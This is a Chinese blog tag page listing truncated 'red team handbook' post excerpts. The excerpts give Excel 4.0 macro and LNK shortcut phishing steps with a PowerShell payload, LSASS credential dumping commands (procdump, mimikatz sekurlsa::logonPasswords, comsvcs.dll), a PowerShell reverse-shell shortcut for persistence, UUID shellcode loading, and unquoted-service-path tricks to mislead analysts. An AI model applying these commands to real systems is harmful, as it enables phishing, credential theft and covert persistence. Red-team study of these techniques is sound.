TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 6 篇与 红队手册 的结果
2021-02-20

红队技巧-网络钓鱼

红队技巧-网络钓鱼
前言涵盖了现在大多数红队钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜!1. excel宏执行任意命令新建一个exel表,然后打开,对准这个右键点击插入宏。然后在第一切换到宏,复制粘贴如下语句:=EXEC("notepad") =HALT()必须带=HALT(),不然虽然命令执行了,但会报错,容易露馅!然后测试一下,选中语句,右键,点击执行:就会弹出notepad:通过msf生成msi文件,python开启http服务,然后替换命令为攻击载荷,右键隐藏宏,并把文件执行方式改为Auto_open,直接复制粘贴,按一下enter就行了然后另存,2016版本记得点击否,然后得选择一个启用宏的文件,远方服务器监听:就欧克了,当然这里肯定不止这个msi文件,都能执行命令了,该怎么利用,你懂的!2 Link钓鱼:随便选择一个应用或者文件,右键点击创建快捷方式,右键打开属性:我们需要更改目标这里的目标,这里的目标路径改成我们的攻击载荷,下面的起始位置可以不更改,基本上没啥影响。修改:C:\Windows\System32\cmd.exe /c powershell -nop...
Harvey
2021-02-20

红队手册,Gamma实验室

31 阅读
0 评论
2021年02月20日
31 阅读
0 评论
2021-02-17

红队技巧-导出凭据和密码

红队技巧-导出凭据和密码
前言红队中各种抓取密码凭据的方法,文末彩蛋,内附工具链接,以及我制作的过360的minikatz的版本,各位请享用,最近筹备重新开blog,记录学习计划,不然知识我学完立马就忘了,与大家一起学习!1.Procdump转储Lsass.exe的内存前提:需要管理员及以上权限常用命令:procdump -accepteula -ma lsass.exe lsass_dump导出的.dmp文件本地配合minikatz 取出密码sekurlsa::Minidump lsassdump.dmp sekurlsa::logonPasswords如果对lsass.exe敏感的话,那么还可以配合lsass.exe的pid来使用更香:procdump -accepteula -ma pid lsass.dmp2.wce导出hash前提:需要管理员及以上权限,版本限制(仅支持Windows XP,2003,Vista,7、2008和Windows 8)命令:wce.exe -o file.txt wec.exe3.comsvcs.dll转储LSASS.exe内存前提:在powershell中运行,管...
Harvey
2021-02-17

红队手册,Gamma实验室

33 阅读
0 评论
2021年02月17日
33 阅读
0 评论
2021-01-30

红队技巧-利用uuid加载shellcode

红队技巧-利用uuid加载shellcode
前言近期国外的Tweet上面的Check Point Research发布了一篇有趣的推文:这篇推文大概讲的是通过分析了一个恶意样本,找到一种非常有趣的向内存写入shellcode方式。这里就不细究钓鱼文档利用宏加载shellcode的细节了,感兴趣的可以去看这篇文章:https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/值得注意的是:在自定义代码中,攻击者使用了windows api 遍历了大量硬编码 UUID 值列表,并且每次都提供指向分配内存(堆)的指针,深入分析后,发现了一种将数据写入堆的方法。这种技术早在2017年就有国外大佬提出,但是最近才抓到恶意样本,爆出来!!uuid是什么?通用唯一识别码(Universally Unique Identifier,缩写:UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。当然还有一种GUID(全局唯一标识符(英语:Glo...
Harvey
2021-01-30

红队手册,Gamma实验室

37 阅读
0 评论
2021年01月30日
37 阅读
0 评论
2020-10-20

红队技巧-持久性技巧

红队技巧-持久性技巧
“今天,我将介绍关于hacker拿到一台服务器之后,如何建立持久性的后门的一些非常实用的小技巧!”前言:能留后门的工具很多,技术方法也很多,但是今天我将介绍一些简单并且异常实用的方法。1.快捷链接方式对,你想的没错,我们就是创建一个快捷方式,里面的链接替换上我们的有效载荷,欺骗管理员点击,运行我们的shell和执行代码。用社会工程学的角度来提高我们方法的可行性的几点:1.替换的快捷图标可以改成一些常用的软件,但不仅限于软件,提高管理员点击的可能性。2.改好的快捷方式可以放在比较显眼的地方,进一步提高可能性。3.最好不要用一些没用过或者安装过软件或者其他东西的快捷链接,这可能会引起怀疑。4.可以查看一波常用软件实用频率记录,比如可以从360软件管家这些第三方软考,也可直接查看控制面板中的程序实用频率。演示:我们创建一个安全狗快捷链接:这里我用我的windows7虚拟机创建安全狗的快捷链接尝试实用cmd.exe起powershell执行反弹shell。这里我直接用python起个简单的http服务$client = New-Object System.Net.Sockets.TCPC...
Harvey
2020-10-20

红队手册,Gamma实验室

23 阅读
0 评论
2020年10月20日
23 阅读
0 评论
2020-10-20

红队手册-创新的红队技术

红队手册-创新的红队技术
“脑洞有多大,攻击面就有多大!”{mtitle}使用“未报价的服务路径”误导分析人员:{/mtitle}如果要将后门部署为新服务,那么“Unquoted Service Path”来混淆检测系统和分析人员是一个不错的选择。栗子:服务路径:C: Program Files decoymalware.exe实际恶意软件:C: Program.exe可以将合法且经过签名的二进制文件放在此处,那就更加完美了。那么什么是“未报价的服务路径”?当一个服务被创建,其可执行文件路径包含空格和内未封闭的引号,会导致一个漏洞,它允许用户获得SYSTEM权限。在Windows中,如果服务未包含在引号中并具有空格,则它将作为中断处理该空格,并将服务路径的其余部分作为参数传递。根本原因:这是由CreateProcess函数引起的,该函数创建一个新进程及其主线程。其语法为: BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTESlpProce...
Harvey
2020-10-20

红队手册,Gamma实验室

25 阅读
0 评论
2020年10月20日
25 阅读
0 评论
2020-10-20

红队手册-技术信息收集

红队手册-技术信息收集
“技术信息收集包括确定对手所需的情报的关键技术要素的过程,以便最佳地进行攻击。”常用得手法技巧总结:1.获取OSINT数据集和信息:开源情报(OSINT)是从公开来源收集的情报。这可以包括在线收集的信息,例如从搜索引擎收集的信息,以及在现实世界中收集的信息,各种社交网站,博客,购物网站,快递公司......。2.进行主动扫描:主动扫描是将传输发送到终端节点并分析响应以识别有关通信系统的信息的行为。如AWVS,APPSCAN,OPENVAS,NESSUS等。3.进行被动扫描:被动扫描是查看现有网络流量以识别有关通信系统的信息的行为。4.进行社会工程:社会工程学是操纵人以使他们泄露信息或采取行动的实践。走过最远的路就是红队人员的套路,什么丢U盘,佯装电工什么的,断网攻击啥的,拔网线那必须也是们技术活。5.确定第三方基础设施服务:基础结构服务包括操作通信环境所需的硬件,软件和网络资源。该基础结构可以由第三方管理,而不是由所属组织管理。比如用的哪个运营商流量,防火墙用的哪家的,路由器用的哪家的。。。。等等。6.确定域和IP地址空间:域名是人类可读的名称,用于表示一个或多个IP地址。IP地...
Harvey
2020-10-20

红队手册,Gamma实验室

22 阅读
0 评论
2020年10月20日
22 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
98 文章数
9 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

微博热搜榜

  • 获取失败!

今日天气